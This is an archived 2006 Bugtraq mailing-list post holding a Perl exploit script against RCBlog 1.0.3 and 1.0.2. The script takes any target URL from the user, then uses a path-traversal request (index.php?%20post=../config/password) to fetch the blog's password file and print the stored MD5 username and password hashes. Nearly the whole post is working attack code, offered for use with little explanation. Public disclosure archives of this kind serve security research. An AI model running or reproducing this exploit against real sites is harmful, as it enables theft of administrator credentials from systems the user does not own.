lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060218144638.27693.qmail@securityfocus.com> Date: 18 Feb 2006 14:46:38 -0000 From: hessam@...samx.net To: bugtraq@...urityfocus.com Subject: RCblog exploit [fun] #!/usr/bin/perl # # RCBlog 1.0.3 / 1.0.2 # Exploit by Hessam-x (www.hessamx.net) # Name : RCBlog (www.fluffington.com # version : 1.0.3 / 1.0.2 # manual exploiting: # index.php?%20post=../config/password # use LWP::Simple; print "-------------------------------------------\n"; print "= RCBlog 1.0.3 / 1.0.2 =\n"; print "= By Hessam-x - www.hackerz.ir =\n"; print "-------------------------------------------\n\n"; print "Target(http://www.example.com)\> "; chomp($targ = <STDIN>); print "Path: (/rcblog/)\>"; chomp($path=<STDIN>); $url = "index.php?%20post=../config/password"; $page = get($targ.$path.$url) || die "[-] Unable to retrieve: $!"; print "[+] Connected to: $targ\n"; $page =~ m/<div class="title">(.*?)<\/div>/ && print "[+] MD5 [Username] [Password]:\n $1\n"; print "[-] Unable to retrieve User ID\n" if(!$1);